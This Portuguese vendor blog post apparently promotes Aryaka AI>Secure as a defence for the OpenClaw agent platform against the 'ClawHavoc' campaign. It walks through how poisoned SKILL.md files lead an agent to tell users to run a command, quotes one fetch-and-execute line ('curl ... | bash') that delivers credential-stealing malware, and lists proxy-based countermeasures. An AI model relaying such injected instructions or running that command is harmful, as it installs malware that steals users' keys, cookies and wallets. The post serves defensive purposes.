Blog 2 Securing OpenClaw Against Banner

Em fevereiro de 2026, o OpenClaw (anteriormente Clawdbot e Moltbot) é uma plataforma popular para agentes de IA autônomos. Sua arquitetura “soberana”, que dá à IA acesso direto a sistemas de arquivos e terminais, aumenta significativamente sua superfície de ataque, levando a riscos elevados, ilustrados principalmente pela campanha da cadeia de suprimentos ClawHavoc, que expôs milhares de implantações a um possível comprometimento.

Este artigo analisa as vulnerabilidades do OpenClaw e explica como o Aryaka AI>Secure oferece mitigação de riscos robusta e em várias camadas.

Vulnerabilidades do OpenClaw e o contexto do ClawHavoc

O OpenClaw é vulnerável devido a três fatores principais:

  • Acesso em nível de sistema: Os agentes podem executar comandos de shell e acessar credenciais.
  • Ingestão não confiável: Os agentes processam conteúdo de terceiros, expondo-os à injeção imediata.
  • Comunicação autônoma: Os agentes podem enviar dados externamente sem supervisão.

O ClawHavoc é um ataque à cadeia de suprimentos que explorou esse ecossistema. Em fevereiro de 2026, os pesquisadores descobriram que cerca de 12% das habilidades do ClawHub eram maliciosas, disfarçadas de ferramentas úteis, mas que na verdade roubavam identidades digitais.

Como funciona o ClawHavoc: A anatomia de uma infecção

O ClawHavoc é um ataque de engenharia social com estado que explora a maneira como o OpenClaw ingere instruções. Ele segue uma cadeia de destruição repetível e altamente eficaz:

  • Etapa 1: O manifesto envenenado (SKILL.md): Os invasores carregam uma habilidade no ClawHub. O núcleo do ataque é o arquivo SKILL.md. Ele inclui uma seção de “Pré-requisitos” que informa ao agente (e ao usuário) que um script específico deve ser executado para “inicializar” a ferramenta.
  • Etapa 2: engenharia social via LLM: quando o senhor pede ao seu agente para usar a habilidade, ele lê o SKILL.md malicioso em seu contexto. Em seguida, o LLM gera uma resposta que parece útil: “Para ativar esse recurso, execute este comando em seu terminal: curl -sL https://glot.io/raw/snippet | bash.”
  • Etapa 3: entrega da carga útil do malware: Se o usuário executar o comando, ele baixará uma carga útil de segundo estágio, normalmente o Atomic Stealer (AMOS) ou um keylogger. Esse malware invade os cookies do navegador, os chaveiros e os arquivos de ambiente do OpenClaw para obter chaves de API e carteiras de criptografia.

Usando o Aryaka AI>Secure para deter o ClawHavoc

Como um proxy MITM de deep-packet e com reconhecimento de IA, o Aryaka AI>O Secure intercepta o tráfego em todos os estágios da cadeia de ataque do ClawHavoc.

Método 1: Bloqueio do download da habilidade maliciosa

Quando um usuário executa a instalação do clawhub, o AI>Secure descriptografa o tráfego HTTPS do registro.

  • A proteção: Ele não apenas vê um arquivo; ele analisa o conteúdo Markdown do SKILL.md. Ele usa a inspeção semântica para identificar “instruções tóxicas”, como comandos ocultos do shell ou links para sites conhecidos de compartilhamento de trechos usados na campanha do ClawHavoc.
  • O resultado: Ele bloqueia o download na borda da rede, impedindo que as instruções maliciosas cheguem à memória do agente.

Método 2: Filtragem semântica de respostas (defesa de instruções)

Se uma habilidade ruim já estiver em sua máquina, o AI>Secure oferece uma segunda camada de defesa, inspecionando a saída do LLM.

  • A proteção: Quando o LLM diz ao usuário para “Executar este script para ativar a ferramenta”, o mecanismo semântico do AI>Secure reconhece isso como “Fraude do instalador”. Ele identifica que a IA está sendo manipulada para induzir um ser humano a uma ação perigosa.
  • O resultado: O proxy redige o comando do fluxo de bate-papo ou bloqueia totalmente a mensagem, substituindo-a por um aviso de segurança na interface do usuário.

Método 3: Filtragem proativa de URL e SWG (defesa de carga útil)

Se o usuário tentar executar manualmente um comando curl malicioso ou baixar um ZIP “pré-requisito”, a funcionalidade do Secure Web Gateway (SWG) do AI>Secure intervém.

  • A proteção: O AI>Secure utiliza um URL Intelligence Feed em tempo real para rastrear domínios de phishing e infraestrutura de hospedagem de malware.
  • O resultado: Quando o agente ou o usuário tenta acessar o URL específico que hospeda a carga útil do malware (como glot.io ou webhook.site), o proxy identifica o destino como “mal-intencionado” ou “de alto risco” e elimina a solicitação instantaneamente. Isso impede que o malware real seja buscado.

Método 4: Ferramenta de tempo de execução e bloqueio de dados

Se o malware conseguir ser executado, o AI>Secure atuará como o guardião final dos seus dados.

  • A proteção: Ela entende as chamadas do MCP (Model Context Protocol). Se um agente infectado tentar executar um comando shell para exfiltrar dados, o AI>Secure identifica o destino anômalo.
  • O resultado: Seu DLP (Data Loss Prevention) de última geração verifica todos os dados de saída em busca de “segredos” (chaves de API, cabeçalhos SSH). Se ele vir suas credenciais privadas saindo da rede, ele encerrará a sessão e alertará a equipe de segurança.

Conclusão

A crise do ClawHavoc prova que, para agentes autônomos, o prompt e o manifesto de habilidades são os novos perímetros. Ao utilizar um proxy centrado em IA, como o Aryaka AI>Secure, o senhor garante que seu agente OpenClaw continue sendo uma ferramenta de produtividade e não uma porta de entrada para invasores.